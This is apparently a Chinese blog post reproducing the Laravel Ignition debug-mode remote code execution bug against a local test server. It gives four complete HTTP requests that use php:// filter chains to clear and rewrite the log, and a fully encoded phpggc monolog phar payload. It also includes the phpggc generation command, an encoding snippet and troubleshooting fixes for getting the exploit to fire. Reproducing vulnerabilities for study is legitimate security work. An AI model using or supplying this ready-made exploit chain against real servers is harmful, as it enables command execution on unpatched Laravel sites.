LARAVEL

/ 0评 / 0

LARAVEL <= V8.4.2 RCE 复现

在队里发现爆了LARAVEL的洞,想着来复现下
参考: https://www.ambionics.io/blog/laravel-debug-rce

环境搭建

在github下载8.4.0的框架
使用composer下载依赖
开启debug模式
php serve 即可

漏洞分析

主要就是Ignition(<=2.5.1)中

./vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php

的问题,开发者可以通过点击按钮的方式,快速修复一些错误。这里基本没有过滤导致了viewFile参数可控,并且其调用了file_put_contentsfile_get_contents 导致我们可以执行伪协议

image-20210114101815100

可以触发phar
又因为 laravel 默认会把报错存到log里面,这使得我们的payload有落地的文件,所以思路就有了
将我们构造好的payload写入log 触发phar反序列化 完成rce
由于laravel的日志系统使用的是monolog,
所以这个部分,可以参考phpggc中的链子monolog-rce1
在debug状态下 使用这个函数对出错误的路由进行自动修复并写入文件
抓个包就可以看到了

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 196
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6IkhRbWN1Uk0rSTU5aDJTZmkrTENENmc9PSIsInZhbHVlIjoiRzNId29jZVVTL1ByYmVxREdjUWgrL2VERU4zMXYwS3lFdExGS3NpTEcwc2h1SklKcDRYSk9DWVRvOW5qZUVlbzNEVVJ1czF6NWVETHBXVlMzNXVwZlROMkYwUHZ1ajgyTG1zdVVHVWVZNGhVZit0dFp1VkJiV2pYVWJROHVTNlciLCJtYWMiOiJmOTFiYjFiZjA0MTI2OWMzZTZhYjIwYWI4YzUxMzIxMjA3YjhkZDdhODVjNzQ1ZWJlZjEwOTRmZjgyOGIwZDYxIn0%3D; laravel_session=eyJpdiI6IlNlYktMUXBKWmp3V0lzQ2tWMEhFUUE9PSIsInZhbHVlIjoiM3crMXdqNk1qaFc2eXZwOXVXRW03bGlCNnZRSTBQbFMwcW5WbmtTMmRKYXhwMmRtdnhZZDl2b0ZiUkx5R1BLbWl1azdTN0NFVElUNFprb2QyaHphNVQ4ZDZxU09QSVBVbnpVOHNEdDduaHZUVVk1cWlwTDJTeHRNL3h5ZkJTOGEiLCJtYWMiOiI2MjIzOTc1NTgwMmUxMzU1NjlmMWQyNGYyYjliNDRjNmIyYmM5ZjliODBhZDgzY2Q5ZDk5NGQwNjUxMjRmZTk1In0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"/Applications/MAMP/htdocs/laravel/resources/views/hello.blade.php"}}

由于这里完全可控 就可以利用伪协议了

复现过程

第一步 清空日志

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 330
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ii8zV2RsZkt3UGRYcEVwSmgzVzFtRGc9PSIsInZhbHVlIjoiR2J1NmQweUZkSzY5TWczVWg4RFVVWi95WHEwTStMTGp1VXZINkRPODZ4MTl1eEtoc2pNVmJvak84R3ZRL3diSmNWT0NoZ1RhQzdlUmFReDJWZTF2TlZ6RU5SaURCOXRwS25NbGRqOEVLS1BUdHJZNFova2I4UktQOGhHOGVSRnciLCJtYWMiOiI2ZDhhNDYwYzMxYWZlNjkzZWE5N2YwNmJjZGQ4NTQwZmY0YWNhY2Y1NzBkNTlkNTdkMGU5YjU0MWUxZDJmNTRjIn0%3D; laravel_session=eyJpdiI6IjlTbjlhYkxjVDhZM1VGZk13U01mbWc9PSIsInZhbHVlIjoiaFEzMzA5cWEyM0E5ek02WXNBM3RSeGNoYUJuN1dueHRiVjNWNG1peUZWYWZzNFFoL2hpYU94Z0VYY0h1Tk1MNTlMbytQdnQvK3piKzgxZ2FERnBZenZBMTEvVDQrNXhkN21vRi9aa0RVVWd2b3RQaW5BbEx5VXc5TjJ4ZzM2R2wiLCJtYWMiOiJhOWQwZmFmOGE3ZDY4MzY3ZDJiZWMwYzlkYjk0M2M0ZDM3MmQ2MzU4YTdkNTU3MjlkZmM1MGI2MjIzYTAwZGUwIn0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{  "variableName":"usesname","viewFile":"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

第二步 生成并写入payload

首先生成

php -d'phar.readonly=0' ./phpggc monolog/rce1 system id --phar phar -o php://output | base64 -w0 | sed -E 's/./\0=00/g'

 

image-20210114202108801

然后写入日志

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 6302
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6IkhRbWN1Uk0rSTU5aDJTZmkrTENENmc9PSIsInZhbHVlIjoiRzNId29jZVVTL1ByYmVxREdjUWgrL2VERU4zMXYwS3lFdExGS3NpTEcwc2h1SklKcDRYSk9DWVRvOW5qZUVlbzNEVVJ1czF6NWVETHBXVlMzNXVwZlROMkYwUHZ1ajgyTG1zdVVHVWVZNGhVZit0dFp1VkJiV2pYVWJROHVTNlciLCJtYWMiOiJmOTFiYjFiZjA0MTI2OWMzZTZhYjIwYWI4YzUxMzIxMjA3YjhkZDdhODVjNzQ1ZWJlZjEwOTRmZjgyOGIwZDYxIn0%3D; laravel_session=eyJpdiI6IlNlYktMUXBKWmp3V0lzQ2tWMEhFUUE9PSIsInZhbHVlIjoiM3crMXdqNk1qaFc2eXZwOXVXRW03bGlCNnZRSTBQbFMwcW5WbmtTMmRKYXhwMmRtdnhZZDl2b0ZiUkx5R1BLbWl1azdTN0NFVElUNFprb2QyaHphNVQ4ZDZxU09QSVBVbnpVOHNEdDduaHZUVVk1cWlwTDJTeHRNL3h5ZkJTOGEiLCJtYWMiOiI2MjIzOTc1NTgwMmUxMzU1NjlmMWQyNGYyYjliNDRjNmIyYmM5ZjliODBhZDgzY2Q5ZDk5NGQwNjUxMjRmZTk1In0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"...=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=79=00=4F=00=69=00=4A=00=73=00=63=00=79=00=49=00=37=00=63=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=57=00=35=00=70=00=64=00=47=00=6C=00=68=00=62=00=47=00=6C=00=36=00=5A=00=57=00=51=00=69=00=4F=00=32=00=49=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=4D=00=61=00=57=00=31=00=70=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=77=00=63=00=6D=00=39=00=6A=00=5A=00=58=00=4E=00=7A=00=62=00=33=00=4A=00=7A=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=63=00=36=00=49=00=6D=00=4E=00=31=00=63=00=6E=00=4A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=59=00=36=00=49=00=6E=00=4E=00=35=00=63=00=33=00=52=00=6C=00=62=00=53=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=49=00=36=00=49=00=6D=00=78=00=7A=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=76=00=79=00=34=00=41=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=76=00=79=00=34=00=41=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=45=00=33=00=52=00=45=00=4C=00=74=00=4D=00=43=00=48=00=2F=00=4D=00=6B=00=76=00=43=00=42=00=6F=00=53=00=39=00=41=00=6C=00=52=00=35=00=72=00=76=00=4C=00=76=00=73=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00"}}

第三部 触发生成phar

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 300
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ii8zV2RsZkt3UGRYcEVwSmgzVzFtRGc9PSIsInZhbHVlIjoiR2J1NmQweUZkSzY5TWczVWg4RFVVWi95WHEwTStMTGp1VXZINkRPODZ4MTl1eEtoc2pNVmJvak84R3ZRL3diSmNWT0NoZ1RhQzdlUmFReDJWZTF2TlZ6RU5SaURCOXRwS25NbGRqOEVLS1BUdHJZNFova2I4UktQOGhHOGVSRnciLCJtYWMiOiI2ZDhhNDYwYzMxYWZlNjkzZWE5N2YwNmJjZGQ4NTQwZmY0YWNhY2Y1NzBkNTlkNTdkMGU5YjU0MWUxZDJmNTRjIn0%3D; laravel_session=eyJpdiI6IjlTbjlhYkxjVDhZM1VGZk13U01mbWc9PSIsInZhbHVlIjoiaFEzMzA5cWEyM0E5ek02WXNBM3RSeGNoYUJuN1dueHRiVjNWNG1peUZWYWZzNFFoL2hpYU94Z0VYY0h1Tk1MNTlMbytQdnQvK3piKzgxZ2FERnBZenZBMTEvVDQrNXhkN21vRi9aa0RVVWd2b3RQaW5BbEx5VXc5TjJ4ZzM2R2wiLCJtYWMiOiJhOWQwZmFmOGE3ZDY4MzY3ZDJiZWMwYzlkYjk0M2M0ZDM3MmQ2MzU4YTdkNTU3MjlkZmM1MGI2MjIzYTAwZGUwIn0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{"variableName":"usesname","viewFile":"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

第四步 触发phar

POST /_ignition/execute-solution HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 197
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Content-Type: application/json
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/ha1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,mg;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ii8zV2RsZkt3UGRYcEVwSmgzVzFtRGc9PSIsInZhbHVlIjoiR2J1NmQweUZkSzY5TWczVWg4RFVVWi95WHEwTStMTGp1VXZINkRPODZ4MTl1eEtoc2pNVmJvak84R3ZRL3diSmNWT0NoZ1RhQzdlUmFReDJWZTF2TlZ6RU5SaURCOXRwS25NbGRqOEVLS1BUdHJZNFova2I4UktQOGhHOGVSRnciLCJtYWMiOiI2ZDhhNDYwYzMxYWZlNjkzZWE5N2YwNmJjZGQ4NTQwZmY0YWNhY2Y1NzBkNTlkNTdkMGU5YjU0MWUxZDJmNTRjIn0%3D; laravel_session=eyJpdiI6IjlTbjlhYkxjVDhZM1VGZk13U01mbWc9PSIsInZhbHVlIjoiaFEzMzA5cWEyM0E5ek02WXNBM3RSeGNoYUJuN1dueHRiVjNWNG1peUZWYWZzNFFoL2hpYU94Z0VYY0h1Tk1MNTlMbytQdnQvK3piKzgxZ2FERnBZenZBMTEvVDQrNXhkN21vRi9aa0RVVWd2b3RQaW5BbEx5VXc5TjJ4ZzM2R2wiLCJtYWMiOiJhOWQwZmFmOGE3ZDY4MzY3ZDJiZWMwYzlkYjk0M2M0ZDM3MmQ2MzU4YTdkNTU3MjlkZmM1MGI2MjIzYTAwZGUwIn0%3D
Connection: close
{"solution":"Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution","parameters":{  "variableName":"usesname","viewFile":"phar:///Applications/MAMP/htdocs/laravel/storage/logs/laravel.log"}}

image-20210114195550142

一些细节

1.日志清空

本地测了一下 其实不需要清空也是可以把payload写进去的,这里清空应该是为了防止生成的phar大于100M导致不能触发
原作者用了

php://filter/write=convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=/path/to/storage/logs/laravel.log

的方式清空日志,原理就是convert.base64-decode过滤器会将一些非base64字符给过滤掉后再进行decode,多次调用此方法即可清空log

image-20210114201735961

大概是这个意思
网络上还给了一种解决方案

php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log

使用convert.iconv.utf-16be.utf-8 先把文字转换成与base64无关的字符在使用convert.base64-decode清空,原理基本一致 这里不多解释了

2. payload生成

原作者生成payload有点问题。导致我本地除了触发id加一吨点都没用
选择这个就会好很多

php -d'phar.readonly=0' ./phpggc monolog/rce1 system ls --phar phar -o php://output | base64 -w0

然后

>>> import base64
>>> s = 'payload'
>>> ''.join(["=" + hex(ord(i))[2:] + "=00" for i in s]).upper()

3.生成phar

复现过程中经常会遇到这样的报错

file_put_contents(): stream filter (convert.quoted-printable-decode): invalid byte sequence

image-20210114202922000

查了一下是与convert.quoted-printable-decod 有关系,这玩意必须保证是偶数,所以payload前面加几个点污染下即可

image-20210114203013426

之后生成应该是200的回显,就生成了

我这边默认都是770字节,应该在这个范围左右就都可以打

结尾

内容有什么有错误的还请各位师傅指出,可能在解释方面还是有一些欠缺、不了解 呜呜呜

注:

最好在linux生成 Mac生成的有点问题,导致卡了一天
 

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注